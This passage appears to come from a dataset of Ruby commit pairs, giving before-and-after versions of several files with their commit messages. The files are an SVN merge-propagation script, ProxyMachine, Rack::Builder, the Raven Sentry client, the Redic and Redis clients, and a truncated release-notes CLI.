command += " --dry-run" if dryrun
command += " --accept postpone" if using_svn_1_5?
changed_files(command)
end
def cleanup(message_file, targets_file)
FileUtils.rm message_file
FileUtils.rm targets_file
end
def commit(message_file, targets_file)
if File.size(targets_file) > 0
system("svn commit -F #{message_file} --targets #{targets_file}") and cleanup(message_file, targets_file)
else
cleanup(message_file, targets_file) and puts "No files changed."
end
end
def status_message?(line)
line =~ /Skipped.*:/ or line =~ /Merging.*:/ or line =~ /conflicts:/
end
def changed_files(command = "svn status")
changed_files = []
IO.popen(command, 'r') do |out|
out.each_line do |line|
changed_files += line.scan(/\w+\s+(.*)$/).flatten unless status_message?(line)
end
end
return changed_files
end
def each_sibling(url)
greater_siblings(url).each do |sibling|
sibling_url = parent(url) + "/" + sibling
sibling_working_copy = File.join('..', sibling)
update(sibling_url, sibling_working_copy)
Dir.chdir(sibling_working_copy) do
yield sibling
end
end
end
def message_file(changeset)
"propagate_#{changeset}_message.tmp"
end
def targets_file(changeset)
"propagate_#{changeset}_targets.tmp"
end
def pending_propagation_for?(changeset)
File.exist?(message_file(changeset)) and File.exist?(targets_file(changeset))
end
def check_for_outstanding_changes(changeset, url)
each_sibling(url) do |sibling|
if not pending_propagation_for?(changeset)
puts "Examining #{sibling} for outstanding changes..."
merged_files = merge(changeset - 1, changeset, url, :dryrun)
already_changed_files = merged_files & changed_files
if not already_changed_files.empty?
puts "Could not propagate changeset #{changeset} into branch #{sibling} because these files have outstanding changes:"
already_changed_files.each { |f| puts " ../#{sibling}/#{f}" }
puts "\nPlease commit or revert these files before propagation."
abort
end
end
puts
end
end
def perform_merge(changeset, url)
each_sibling(url) do |sibling|
if pending_propagation_for?(changeset)
puts "Found temporary files for changeset #{changeset}, will retry commit."
else
puts "Merging into #{sibling}:"
merged_files = merge(changeset - 1, changeset, url)
File.open(message_file(changeset), 'w') { |f| f.print "Propagating [#{changeset}]: " + log(changeset, url) }
File.open(targets_file(changeset), 'w') { |f| f.print merged_files.join("\n") }
end
commit(message_file(changeset), targets_file(changeset)) and puts "Propagation to #{sibling} complete."
puts
end
end
def propagate(changeset, url)
log(changeset, url) # Trying to pull a log will cause early failure if specified changeset is not found
check_for_outstanding_changes(changeset, url)
perform_merge(changeset, url)
end
def cwd_is_working_copy?
File.exist?('.svn') or File.exist?('_svn')
end
def parent_folder_is_from_same_working_copy?
if File.exist?(File.join('..', '.svn')) or File.exist?(File.join('..', '_svn'))
working_copy_url.index(working_copy_url('..')) == 0
end
end
def in_working_copy_root?
cwd_is_working_copy? and not parent_folder_is_from_same_working_copy?
end
if in_working_copy_root?
changeset = (ARGV[0] or abort(usage)).to_i
propagate(changeset, working_copy_url)
else
abort "Please run #{File.basename($0)} from the root of a subversion working copy."
end
|
require 'rubygems'
require 'eventmachine'
require 'proxymachine/client_connection'
require 'proxymachine/server_connection'
class ProxyMachine
MAX_FAST_SHUTDOWN_SECONDS = 10
def self.update_procline
$0 = "#{self.name} proxymachine: #{self.count} connections"
end
def self.name
@@name
end
def self.count
@@counter
end
def self.incr
@@counter += 1
self.update_procline
@@counter
end
def self.decr
@@counter -= 1
if $server.nil?
puts "Waiting for #{@@counter} connections to finish."
end
self.update_procline
EM.stop if $server.nil? and @@counter == 0
@@counter
end
def self.set_router(block)
@@router = block
end
def self.router
@@router
end
def self.graceful_shutdown(signal)
EM.stop_server($server) if $server
puts "Received #{signal} signal. No longer accepting new connections."
puts "Waiting for #{ProxyMachine.count} connections to finish."
$server = nil
EM.stop if ProxyMachine.count == 0
end
def self.fast_shutdown(signal)
EM.stop_server($server) if $server
puts "Received #{signal} signal. No longer accepting new connections."
puts "Maximum time to wait for connections is #{MAX_FAST_SHUTDOWN_SECONDS} seconds."
puts "Waiting for #{ProxyMachine.count} connections to finish."
$server = nil
EM.stop if ProxyMachine.count == 0
Thread.new do
sleep MAX_FAST_SHUTDOWN_SECONDS
exit!
end
end
def self.run(name, host, port)
@@counter = 0
@@name = name
self.update_procline
EM.epoll
EM.run do
EventMachine::Protocols::ClientConnection.start(host, port)
trap('QUIT') do
self.graceful_shutdown('QUIT')
end
trap('TERM') do
self.fast_shutdown('TERM')
end
trap('INT') do
self.fast_shutdown('INT')
end
end
end
end
module Kernel
def proxy(&block)
ProxyMachine.set_router(block)
end
end
add host:port to procline
require 'rubygems'
require 'eventmachine'
require 'proxymachine/client_connection'
require 'proxymachine/server_connection'
class ProxyMachine
MAX_FAST_SHUTDOWN_SECONDS = 10
def self.update_procline
$0 = "proxymachine - #{@@name} #{@@listen} - #{self.count} connections"
end
def self.count
@@counter
end
def self.incr
@@counter += 1
self.update_procline
@@counter
end
def self.decr
@@counter -= 1
if $server.nil?
puts "Waiting for #{@@counter} connections to finish."
end
self.update_procline
EM.stop if $server.nil? and @@counter == 0
@@counter
end
def self.set_router(block)
@@router = block
end
def self.router
@@router
end
def self.graceful_shutdown(signal)
EM.stop_server($server) if $server
puts "Received #{signal} signal. No longer accepting new connections."
puts "Waiting for #{ProxyMachine.count} connections to finish."
$server = nil
EM.stop if ProxyMachine.count == 0
end
def self.fast_shutdown(signal)
EM.stop_server($server) if $server
puts "Received #{signal} signal. No longer accepting new connections."
puts "Maximum time to wait for connections is #{MAX_FAST_SHUTDOWN_SECONDS} seconds."
puts "Waiting for #{ProxyMachine.count} connections to finish."
$server = nil
EM.stop if ProxyMachine.count == 0
Thread.new do
sleep MAX_FAST_SHUTDOWN_SECONDS
exit!
end
end
def self.run(name, host, port)
@@counter = 0
@@name = name
@@listen = "#{host}:#{port}"
self.update_procline
EM.epoll
EM.run do
EventMachine::Protocols::ClientConnection.start(host, port)
trap('QUIT') do
self.graceful_shutdown('QUIT')
end
trap('TERM') do
self.fast_shutdown('TERM')
end
trap('INT') do
self.fast_shutdown('INT')
end
end
end
end
module Kernel
def proxy(&block)
ProxyMachine.set_router(block)
end
end |
module Rack
# Rack::Builder implements a small DSL to iteratively construct Rack
# applications.
#
# Example:
#
# require 'rack/lobster'
# app = Rack::Builder.new do
# use Rack::CommonLogger
# use Rack::ShowExceptions
# map "/lobster" do
# use Rack::Lint
# run Rack::Lobster.new
# end
# end
#
# run app
#
# Or
#
# app = Rack::Builder.app do
# use Rack::CommonLogger
# run lambda { |env| [200, {'Content-Type' => 'text/plain'}, ['OK']] }
# end
#
# run app
#
# +use+ adds middleware to the stack, +run+ dispatches to an application.
# You can use +map+ to construct a Rack::URLMap in a convenient way.
class Builder
def self.parse_file(config, opts = Server::Options.new)
options = {}
if config =~ /\.ru$/
cfgfile = ::File.read(config)
if cfgfile[/^#\\(.*)/] && opts
options = opts.parse! $1.split(/\s+/)
end
cfgfile.sub!(/^__END__\n.*\Z/m, '')
app = new_from_string cfgfile, config
else
require config
app = Object.const_get(::File.basename(config, '.rb').split('_').map(&:capitalize).join(''))
end
return app, options
end
def self.new_from_string(builder_script, file="(rackup)")
eval "Rack::Builder.new {\n" + builder_script + "\n}.to_app",
TOPLEVEL_BINDING, file, 0
end
def initialize(default_app = nil,&block)
@use, @map, @run, @warmup = [], nil, default_app, nil
instance_eval(&block) if block_given?
end
def self.app(default_app = nil, &block)
self.new(default_app, &block).to_app
end
# Specifies middleware to use in a stack.
#
# class Middleware
# def initialize(app)
# @app = app
# end
#
# def call(env)
# env["rack.some_header"] = "setting an example"
# @app.call(env)
# end
# end
#
# use Middleware
# run lambda { |env| [200, { "Content-Type" => "text/plain" }, ["OK"]] }
#
# All requests through to this application will first be processed by the middleware class.
# The +call+ method in this example sets an additional environment key which then can be
# referenced in the application if required.
def use(middleware, *args, &block)
if @map
mapping, @map = @map, nil
@use << proc { |app| generate_map app, mapping }
end
@use << proc { |app| middleware.new(app, *args, &block) }
end
# Takes an argument that is an object that responds to #call and returns a Rack response.
# The simplest form of this is a lambda object:
#
# run lambda { |env| [200, { "Content-Type" => "text/plain" }, ["OK"]] }
#
# However this could also be a class:
#
# class Heartbeat
# def self.call(env)
# [200, { "Content-Type" => "text/plain" }, ["OK"]]
# end
# end
#
# run Heartbeat
def run(app)
@run = app
end
# Takes a lambda or block that is used to warm-up the application.
#
# warmup do |app|
# client = Rack::MockRequest.new(app)
# client.get('/')
# end
#
# use SomeMiddleware
# run MyApp
def warmup(prc=nil, &block)
@warmup = prc || block
end
# Creates a route within the application.
#
# Rack::Builder.app do
# map '/' do
# run Heartbeat
# end
# end
#
# The +use+ method can also be used here to specify middleware to run under a specific path:
#
# Rack::Builder.app do
# map '/' do
# use Middleware
# run Heartbeat
# end
# end
#
# This example includes a piece of middleware which will run before requests hit +Heartbeat+.
#
def map(path, &block)
@map ||= {}
@map[path] = block
end
def to_app
app = @map ? generate_map(@run, @map) : @run
fail "missing run or map statement" unless app
app = @use.reverse.inject(app) { |a,e| e[a] }
@warmup.call(app) if @warmup
app
end
def call(env)
to_app.call(env)
end
private
def generate_map(default_app, mapping)
mapped = default_app ? {'/' => default_app} : {}
mapping.each { |r,b| mapped[r] = self.class.new(default_app, &b).to_app }
URLMap.new(mapped)
end
end
end
Add space after comma in params to reflect style used everywhere else
module Rack
# Rack::Builder implements a small DSL to iteratively construct Rack
# applications.
#
# Example:
#
# require 'rack/lobster'
# app = Rack::Builder.new do
# use Rack::CommonLogger
# use Rack::ShowExceptions
# map "/lobster" do
# use Rack::Lint
# run Rack::Lobster.new
# end
# end
#
# run app
#
# Or
#
# app = Rack::Builder.app do
# use Rack::CommonLogger
# run lambda { |env| [200, {'Content-Type' => 'text/plain'}, ['OK']] }
# end
#
# run app
#
# +use+ adds middleware to the stack, +run+ dispatches to an application.
# You can use +map+ to construct a Rack::URLMap in a convenient way.
class Builder
def self.parse_file(config, opts = Server::Options.new)
options = {}
if config =~ /\.ru$/
cfgfile = ::File.read(config)
if cfgfile[/^#\\(.*)/] && opts
options = opts.parse! $1.split(/\s+/)
end
cfgfile.sub!(/^__END__\n.*\Z/m, '')
app = new_from_string cfgfile, config
else
require config
app = Object.const_get(::File.basename(config, '.rb').split('_').map(&:capitalize).join(''))
end
return app, options
end
def self.new_from_string(builder_script, file="(rackup)")
eval "Rack::Builder.new {\n" + builder_script + "\n}.to_app",
TOPLEVEL_BINDING, file, 0
end
def initialize(default_app = nil, &block)
@use, @map, @run, @warmup = [], nil, default_app, nil
instance_eval(&block) if block_given?
end
def self.app(default_app = nil, &block)
self.new(default_app, &block).to_app
end
# Specifies middleware to use in a stack.
#
# class Middleware
# def initialize(app)
# @app = app
# end
#
# def call(env)
# env["rack.some_header"] = "setting an example"
# @app.call(env)
# end
# end
#
# use Middleware
# run lambda { |env| [200, { "Content-Type" => "text/plain" }, ["OK"]] }
#
# All requests through to this application will first be processed by the middleware class.
# The +call+ method in this example sets an additional environment key which then can be
# referenced in the application if required.
def use(middleware, *args, &block)
if @map
mapping, @map = @map, nil
@use << proc { |app| generate_map app, mapping }
end
@use << proc { |app| middleware.new(app, *args, &block) }
end
# Takes an argument that is an object that responds to #call and returns a Rack response.
# The simplest form of this is a lambda object:
#
# run lambda { |env| [200, { "Content-Type" => "text/plain" }, ["OK"]] }
#
# However this could also be a class:
#
# class Heartbeat
# def self.call(env)
# [200, { "Content-Type" => "text/plain" }, ["OK"]]
# end
# end
#
# run Heartbeat
def run(app)
@run = app
end
# Takes a lambda or block that is used to warm-up the application.
#
# warmup do |app|
# client = Rack::MockRequest.new(app)
# client.get('/')
# end
#
# use SomeMiddleware
# run MyApp
def warmup(prc=nil, &block)
@warmup = prc || block
end
# Creates a route within the application.
#
# Rack::Builder.app do
# map '/' do
# run Heartbeat
# end
# end
#
# The +use+ method can also be used here to specify middleware to run under a specific path:
#
# Rack::Builder.app do
# map '/' do
# use Middleware
# run Heartbeat
# end
# end
#
# This example includes a piece of middleware which will run before requests hit +Heartbeat+.
#
def map(path, &block)
@map ||= {}
@map[path] = block
end
def to_app
app = @map ? generate_map(@run, @map) : @run
fail "missing run or map statement" unless app
app = @use.reverse.inject(app) { |a,e| e[a] }
@warmup.call(app) if @warmup
app
end
def call(env)
to_app.call(env)
end
private
def generate_map(default_app, mapping)
mapped = default_app ? {'/' => default_app} : {}
mapping.each { |r,b| mapped[r] = self.class.new(default_app, &b).to_app }
URLMap.new(mapped)
end
end
end
|
require 'multi_json'
require 'zlib'
require 'base64'
require 'raven/version'
require 'raven/transports/http'
require 'raven/transports/udp'
module Raven
class Client
PROTOCOL_VERSION = '3.0'
USER_AGENT = "raven-ruby/#{Raven::VERSION}"
CONTENT_TYPE = 'application/json'
attr_accessor :configuration
def initialize(configuration)
@configuration = configuration
end
def send(event)
return unless configuration.send_in_current_environment?
# Set the project ID correctly
event.project = self.configuration.project_id
Raven.logger.debug "Sending event #{event.id} to Sentry"
content_type, encoded_data = encode(event)
transport.send(generate_auth_header(encoded_data), encoded_data,
:content_type => content_type)
end
private
def encode(event)
encoded = MultiJson.encode(event.to_hash)
case self.configuration.encoding
when 'gzip'
gzipped = Zlib::Deflate.deflate(encoded)
b64_encoded = Base64.strict_encode64(gzipped)
return 'application/octet-stream', b64_encoded
else
return 'application/json', encoded
end
end
def transport
@transport ||= case self.configuration.scheme
when 'udp'
Transports::UDP.new self.configuration
when 'http', 'https'
Transports::HTTP.new self.configuration
else
raise Error.new("Unknown transport scheme '#{self.configuration.scheme}'")
end
end
def generate_auth_header(data)
now = Time.now.to_i.to_s
fields = {
'sentry_version' => PROTOCOL_VERSION,
'sentry_client' => USER_AGENT,
'sentry_timestamp' => now,
'sentry_key' => self.configuration.public_key,
'sentry_secret' => self.configuration.secret_key,
}
'Sentry ' + fields.map{|key, value| "#{key}=#{value}"}.join(', ')
end
end
end
Correct protocol version (3, not 3.0)
require 'multi_json'
require 'zlib'
require 'base64'
require 'raven/version'
require 'raven/transports/http'
require 'raven/transports/udp'
module Raven
class Client
PROTOCOL_VERSION = '3'
USER_AGENT = "raven-ruby/#{Raven::VERSION}"
CONTENT_TYPE = 'application/json'
attr_accessor :configuration
def initialize(configuration)
@configuration = configuration
end
def send(event)
return unless configuration.send_in_current_environment?
# Set the project ID correctly
event.project = self.configuration.project_id
Raven.logger.debug "Sending event #{event.id} to Sentry"
content_type, encoded_data = encode(event)
transport.send(generate_auth_header(encoded_data), encoded_data,
:content_type => content_type)
end
private
def encode(event)
encoded = MultiJson.encode(event.to_hash)
case self.configuration.encoding
when 'gzip'
gzipped = Zlib::Deflate.deflate(encoded)
b64_encoded = Base64.strict_encode64(gzipped)
return 'application/octet-stream', b64_encoded
else
return 'application/json', encoded
end
end
def transport
@transport ||= case self.configuration.scheme
when 'udp'
Transports::UDP.new self.configuration
when 'http', 'https'
Transports::HTTP.new self.configuration
else
raise Error.new("Unknown transport scheme '#{self.configuration.scheme}'")
end
end
def generate_auth_header(data)
now = Time.now.to_i.to_s
fields = {
'sentry_version' => PROTOCOL_VERSION,
'sentry_client' => USER_AGENT,
'sentry_timestamp' => now,
'sentry_key' => self.configuration.public_key,
'sentry_secret' => self.configuration.secret_key,
}
'Sentry ' + fields.map{|key, value| "#{key}=#{value}"}.join(', ')
end
end
end
|
Reality+meth is fun
def Object.const_missing(name)
Reality::Entity(name.to_s.gsub('_', ' '))
end
class Numeric
BANNED_METHODS = %i[to_s to_str to_a to_ary to_h to_hash]
def method_missing(name, *arg, &block)
super unless arg.empty? && !block
super if name =~ /\?!$/ || BANNED_METHODS.include?(name)
Reality::Measure(self, name.to_s)
end
end
|
require "redic/connection"
require "uri"
class Redic
class Client
def initialize(url)
@uri = URI.parse(url)
@ttl = Integer(ENV.fetch("REDIC_TTL", 60))
@connection = nil
@semaphore = Mutex.new
end
def read
@connection.read
end
def write(command)
@connection.write(command)
end
def connect
establish_connection unless connected?
timestamp_connection
@semaphore.synchronize do
yield
end
rescue Errno::ECONNRESET
@connection = nil
retry
end
private
def establish_connection
begin
@connection = Redic::Connection.new(@uri)
rescue StandardError => err
raise err, "Can't connect to: %s" % @uri
end
authenticate
end
def timestamp_connection
@timestamp = Time.now.to_i
end
def authenticate
if @uri.password
@semaphore.synchronize do
write [:auth, @uri.password]
read
end
end
end
def connected?
@connection && @connection.connected? && alive?
end
def alive?
Time.now.to_i - @timestamp < @ttl
end
end
end
Remove TTL from connections.
require "redic/connection"
require "uri"
class Redic
class Client
def initialize(url)
@uri = URI.parse(url)
@connection = nil
@semaphore = Mutex.new
end
def read
@connection.read
end
def write(command)
@connection.write(command)
end
def connect
establish_connection unless connected?
@semaphore.synchronize do
yield
end
rescue Errno::ECONNRESET
@connection = nil
retry
end
private
def establish_connection
begin
@connection = Redic::Connection.new(@uri)
rescue StandardError => err
raise err, "Can't connect to: %s" % @uri
end
authenticate
end
def authenticate
if @uri.password
@semaphore.synchronize do
write [:auth, @uri.password]
read
end
end
end
def connected?
@connection && @connection.connected?
end
end
end
|
require "redis/errors"
require "socket"
class Redis
class Client
DEFAULTS = {
:url => lambda { ENV["REDIS_URL"] },
:scheme => "redis",
:host => "127.0.0.1",
:port => 6379,
:path => nil,
:timeout => 5.0,
:password => nil,
:db => 0,
:driver => nil,
:id => nil,
:tcp_keepalive => 0
}
def scheme
@options[:scheme]
end
def host
@options[:host]
end
def port
@options[:port]
end
def path
@options[:path]
end
def timeout
@options[:timeout]
end
def password
@options[:password]
end
def db
@options[:db]
end
def db=(db)
@options[:db] = db.to_i
end
attr_accessor :logger
attr_reader :connection
attr_reader :command_map
def initialize(options = {})
@options = _parse_options(options)
@reconnect = true
@logger = @options[:logger]
@connection = nil
@command_map = {}
end
def connect
@pid = Process.pid
establish_connection
call [:auth, password] if password
call [:select, db] if db != 0
self
end
def id
@options[:id] || "redis://#{location}/#{db}"
end
def location
path || "#{host}:#{port}"
end
def call(command, &block)
reply = process([command]) { read }
raise reply if reply.is_a?(CommandError)
if block
block.call(reply)
else
reply
end
end
def call_loop(command)
error = nil
result = without_socket_timeout do
process([command]) do
loop do
reply = read
if reply.is_a?(CommandError)
error = reply
break
else
yield reply
end
end
end
end
# Raise error when previous block broke out of the loop.
raise error if error
# Result is set to the value that the provided block used to break.
result
end
def call_pipeline(pipeline)
with_reconnect pipeline.with_reconnect? do
begin
pipeline.finish(call_pipelined(pipeline.commands))
rescue ConnectionError => e
return nil if pipeline.shutdown?
# Assume the pipeline was sent in one piece, but execution of
# SHUTDOWN caused none of the replies for commands that were executed
# prior to it from coming back around.
raise e
end
end
end
def call_pipelined(commands)
return [] if commands.empty?
# The method #ensure_connected (called from #process) reconnects once on
# I/O errors. To make an effort in making sure that commands are not
# executed more than once, only allow reconnection before the first reply
# has been read. When an error occurs after the first reply has been
# read, retrying would re-execute the entire pipeline, thus re-issuing
# already successfully executed commands. To circumvent this, don't retry
# after the first reply has been read successfully.
result = Array.new(commands.size)
reconnect = @reconnect
begin
process(commands) do
result[0] = read
@reconnect = false
(commands.size - 1).times do |i|
result[i + 1] = read
end
end
ensure
@reconnect = reconnect
end
result
end
def call_without_timeout(command, &blk)
without_socket_timeout do
call(command, &blk)
end
rescue ConnectionError
retry
end
def process(commands)
logging(commands) do
ensure_connected do
commands.each do |command|
if command_map[command.first]
command = command.dup
command[0] = command_map[command.first]
end
write(command)
end
yield if block_given?
end
end
end
def connected?
connection && connection.connected?
end
def disconnect
connection.disconnect if connected?
end
def reconnect
disconnect
connect
end
def io
yield
rescue TimeoutError
raise TimeoutError, "Connection timed out"
rescue Errno::ECONNRESET, Errno::EPIPE, Errno::ECONNABORTED, Errno::EBADF, Errno::EINVAL => e
raise ConnectionError, "Connection lost (%s)" % [e.class.name.split("::").last]
end
def read
io do
connection.read
end
end
def write(command)
io do
connection.write(command)
end
end
def without_socket_timeout
connect unless connected?
begin
connection.timeout = 0
yield
ensure
connection.timeout = timeout if connected?
end
end
def with_reconnect(val=true)
begin
original, @reconnect = @reconnect, val
yield
ensure
@reconnect = original
end
end
def without_reconnect(&blk)
with_reconnect(false, &blk)
end
protected
def logging(commands)
return yield unless @logger && @logger.debug?
begin
commands.each do |name, *args|
@logger.debug("Redis >> #{name.to_s.upcase} #{args.map(&:to_s).join(" ")}")
end
t1 = Time.now
yield
ensure
@logger.debug("Redis >> %0.2fms" % ((Time.now - t1) * 1000)) if t1
end
end
def establish_connection
@connection = @options[:driver].connect(@options.dup)
rescue TimeoutError
raise CannotConnectError, "Timed out connecting to Redis on #{location}"
rescue Errno::ECONNREFUSED
raise CannotConnectError, "Error connecting to Redis on #{location} (ECONNREFUSED)"
end
def ensure_connected
tries = 0
begin
if connected?
if Process.pid != @pid
raise InheritedError,
"Tried to use a connection from a child process without reconnecting. " +
"You need to reconnect to Redis after forking."
end
else
connect
end
tries += 1
yield
rescue ConnectionError
disconnect
if tries < 2 && @reconnect
retry
else
raise
end
rescue Exception
disconnect
raise
end
end
def _parse_options(options)
defaults = DEFAULTS.dup
options = options.dup
defaults.keys.each do |key|
# Fill in defaults if needed
if defaults[key].respond_to?(:call)
defaults[key] = defaults[key].call
end
# Symbolize only keys that are needed
options[key] = options[key.to_s] if options.has_key?(key.to_s)
end
url = options[:url] || defaults[:url]
# Override defaults from URL if given
if url
require "uri"
uri = URI(url)
if uri.scheme == "unix"
defaults[:path] = uri.path
else
# Require the URL to have at least a host
raise ArgumentError, "invalid url" unless uri.host
defaults[:scheme] = uri.scheme
defaults[:host] = uri.host
defaults[:port] = uri.port if uri.port
defaults[:password] = uri.password if uri.password
defaults[:db] = uri.path[1..-1].to_i if uri.path
end
end
# Use default when option is not specified or nil
defaults.keys.each do |key|
options[key] ||= defaults[key]
end
if options[:path]
options[:scheme] = "unix"
options.delete(:host)
options.delete(:port)
else
options[:host] = options[:host].to_s
options[:port] = options[:port].to_i
end
options[:timeout] = options[:timeout].to_f
options[:db] = options[:db].to_i
options[:driver] = _parse_driver(options[:driver]) || Connection.drivers.last
case options[:tcp_keepalive]
when Hash
[:time, :intvl, :probes].each do |key|
unless options[:tcp_keepalive][key].is_a?(Fixnum)
raise "Expected the #{key.inspect} key in :tcp_keepalive to be a Fixnum"
end
end
when Fixnum
if options[:tcp_keepalive] >= 60
options[:tcp_keepalive] = {:time => options[:tcp_keepalive] - 20, :intvl => 10, :probes => 2}
elsif options[:tcp_keepalive] >= 30
options[:tcp_keepalive] = {:time => options[:tcp_keepalive] - 10, :intvl => 5, :probes => 2}
elsif options[:tcp_keepalive] >= 5
options[:tcp_keepalive] = {:time => options[:tcp_keepalive] - 2, :intvl => 2, :probes => 1}
end
end
options
end
def _parse_driver(driver)
driver = driver.to_s if driver.is_a?(Symbol)
if driver.kind_of?(String)
case driver
when "ruby"
require "redis/connection/ruby"
driver = Connection::Ruby
when "hiredis"
require "redis/connection/hiredis"
driver = Connection::Hiredis
when "synchrony"
require "redis/connection/synchrony"
driver = Connection::Synchrony
else
raise "Unknown driver: #{driver}"
end
end
driver
end
end
end
password could contain numerous special character that would break your URI
require "redis/errors"
require "socket"
class Redis
class Client
DEFAULTS = {
:url => lambda { ENV["REDIS_URL"] },
:scheme => "redis",
:host => "127.0.0.1",
:port => 6379,
:path => nil,
:timeout => 5.0,
:password => nil,
:db => 0,
:driver => nil,
:id => nil,
:tcp_keepalive => 0
}
def scheme
@options[:scheme]
end
def host
@options[:host]
end
def port
@options[:port]
end
def path
@options[:path]
end
def timeout
@options[:timeout]
end
def password
@options[:password]
end
def db
@options[:db]
end
def db=(db)
@options[:db] = db.to_i
end
attr_accessor :logger
attr_reader :connection
attr_reader :command_map
def initialize(options = {})
@options = _parse_options(options)
@reconnect = true
@logger = @options[:logger]
@connection = nil
@command_map = {}
end
def connect
@pid = Process.pid
establish_connection
call [:auth, password] if password
call [:select, db] if db != 0
self
end
def id
@options[:id] || "redis://#{location}/#{db}"
end
def location
path || "#{host}:#{port}"
end
def call(command, &block)
reply = process([command]) { read }
raise reply if reply.is_a?(CommandError)
if block
block.call(reply)
else
reply
end
end
def call_loop(command)
error = nil
result = without_socket_timeout do
process([command]) do
loop do
reply = read
if reply.is_a?(CommandError)
error = reply
break
else
yield reply
end
end
end
end
# Raise error when previous block broke out of the loop.
raise error if error
# Result is set to the value that the provided block used to break.
result
end
def call_pipeline(pipeline)
with_reconnect pipeline.with_reconnect? do
begin
pipeline.finish(call_pipelined(pipeline.commands))
rescue ConnectionError => e
return nil if pipeline.shutdown?
# Assume the pipeline was sent in one piece, but execution of
# SHUTDOWN caused none of the replies for commands that were executed
# prior to it from coming back around.
raise e
end
end
end
def call_pipelined(commands)
return [] if commands.empty?
# The method #ensure_connected (called from #process) reconnects once on
# I/O errors. To make an effort in making sure that commands are not
# executed more than once, only allow reconnection before the first reply
# has been read. When an error occurs after the first reply has been
# read, retrying would re-execute the entire pipeline, thus re-issuing
# already successfully executed commands. To circumvent this, don't retry
# after the first reply has been read successfully.
result = Array.new(commands.size)
reconnect = @reconnect
begin
process(commands) do
result[0] = read
@reconnect = false
(commands.size - 1).times do |i|
result[i + 1] = read
end
end
ensure
@reconnect = reconnect
end
result
end
def call_without_timeout(command, &blk)
without_socket_timeout do
call(command, &blk)
end
rescue ConnectionError
retry
end
def process(commands)
logging(commands) do
ensure_connected do
commands.each do |command|
if command_map[command.first]
command = command.dup
command[0] = command_map[command.first]
end
write(command)
end
yield if block_given?
end
end
end
def connected?
connection && connection.connected?
end
def disconnect
connection.disconnect if connected?
end
def reconnect
disconnect
connect
end
def io
yield
rescue TimeoutError
raise TimeoutError, "Connection timed out"
rescue Errno::ECONNRESET, Errno::EPIPE, Errno::ECONNABORTED, Errno::EBADF, Errno::EINVAL => e
raise ConnectionError, "Connection lost (%s)" % [e.class.name.split("::").last]
end
def read
io do
connection.read
end
end
def write(command)
io do
connection.write(command)
end
end
def without_socket_timeout
connect unless connected?
begin
connection.timeout = 0
yield
ensure
connection.timeout = timeout if connected?
end
end
def with_reconnect(val=true)
begin
original, @reconnect = @reconnect, val
yield
ensure
@reconnect = original
end
end
def without_reconnect(&blk)
with_reconnect(false, &blk)
end
protected
def logging(commands)
return yield unless @logger && @logger.debug?
begin
commands.each do |name, *args|
@logger.debug("Redis >> #{name.to_s.upcase} #{args.map(&:to_s).join(" ")}")
end
t1 = Time.now
yield
ensure
@logger.debug("Redis >> %0.2fms" % ((Time.now - t1) * 1000)) if t1
end
end
def establish_connection
@connection = @options[:driver].connect(@options.dup)
rescue TimeoutError
raise CannotConnectError, "Timed out connecting to Redis on #{location}"
rescue Errno::ECONNREFUSED
raise CannotConnectError, "Error connecting to Redis on #{location} (ECONNREFUSED)"
end
def ensure_connected
tries = 0
begin
if connected?
if Process.pid != @pid
raise InheritedError,
"Tried to use a connection from a child process without reconnecting. " +
"You need to reconnect to Redis after forking."
end
else
connect
end
tries += 1
yield
rescue ConnectionError
disconnect
if tries < 2 && @reconnect
retry
else
raise
end
rescue Exception
disconnect
raise
end
end
def _parse_options(options)
defaults = DEFAULTS.dup
options = options.dup
defaults.keys.each do |key|
# Fill in defaults if needed
if defaults[key].respond_to?(:call)
defaults[key] = defaults[key].call
end
# Symbolize only keys that are needed
options[key] = options[key.to_s] if options.has_key?(key.to_s)
end
url = options[:url] || defaults[:url]
# Override defaults from URL if given
if url
require "uri"
uri = URI(url)
if uri.scheme == "unix"
defaults[:path] = uri.path
else
# Require the URL to have at least a host
raise ArgumentError, "invalid url" unless uri.host
defaults[:scheme] = uri.scheme
defaults[:host] = uri.host
defaults[:port] = uri.port if uri.port
defaults[:password] = CGI::unescape(uri.password) if uri.password
defaults[:db] = uri.path[1..-1].to_i if uri.path
end
end
# Use default when option is not specified or nil
defaults.keys.each do |key|
options[key] ||= defaults[key]
end
if options[:path]
options[:scheme] = "unix"
options.delete(:host)
options.delete(:port)
else
options[:host] = options[:host].to_s
options[:port] = options[:port].to_i
end
options[:timeout] = options[:timeout].to_f
options[:db] = options[:db].to_i
options[:driver] = _parse_driver(options[:driver]) || Connection.drivers.last
case options[:tcp_keepalive]
when Hash
[:time, :intvl, :probes].each do |key|
unless options[:tcp_keepalive][key].is_a?(Fixnum)
raise "Expected the #{key.inspect} key in :tcp_keepalive to be a Fixnum"
end
end
when Fixnum
if options[:tcp_keepalive] >= 60
options[:tcp_keepalive] = {:time => options[:tcp_keepalive] - 20, :intvl => 10, :probes => 2}
elsif options[:tcp_keepalive] >= 30
options[:tcp_keepalive] = {:time => options[:tcp_keepalive] - 10, :intvl => 5, :probes => 2}
elsif options[:tcp_keepalive] >= 5
options[:tcp_keepalive] = {:time => options[:tcp_keepalive] - 2, :intvl => 2, :probes => 1}
end
end
options
end
def _parse_driver(driver)
driver = driver.to_s if driver.is_a?(Symbol)
if driver.kind_of?(String)
case driver
when "ruby"
require "redis/connection/ruby"
driver = Connection::Ruby
when "hiredis"
require "redis/connection/hiredis"
driver = Connection::Hiredis
when "synchrony"
require "redis/connection/synchrony"
driver = Connection::Synchrony
else
raise "Unknown driver: #{driver}"
end
end
driver
end
end
end
|
require 'trollop'
require 'releasenoter/version'
require "git"
module Releasenoter
patterns = {
jira: /(\w{2,4}-\d+)/,
github: /\#(\d+)/
}
class Cli
def self.start_cli
@opts = Trollop::options do
version "Releasenoter " + Releasenoter::VERSION
opt :since, "Starting point", :type => :string
opt :to, "Ending at", :type => :string
opt :github, "Highlight Github issue commits", :default => true
opt :jira, "Highlight JIRA issue commits", :default => true
opt :merges, "Include merge commits", :default => false
opt :untagged, "Skip commits without issue references", :default => true
end
end
def self.get_opts
return @opts
end
end
class FromGit
def self.get_log
cli_opts = Releasenoter::Cli.get_opts
if cli_opts[:github]
puts "Will highlight Github issue commits."
end
if cli_opts[:jira]
puts "Will highlight JIRA issue commits."
end
if cli_opts[:merges]
puts "Will include merge commits."
end
@git = Git.open('.')
if cli_opts[:since] && !cli_opts[:to]
gitlog = @git.log.since(cli_opts[:since])
elsif cli_opts[:since] && cli_opts[:to]
gitlog = @git.log.between(cli_opts[:since], cli_opts[:to])
else
gitlog = @git.log
end
gitlog.each do |commit|
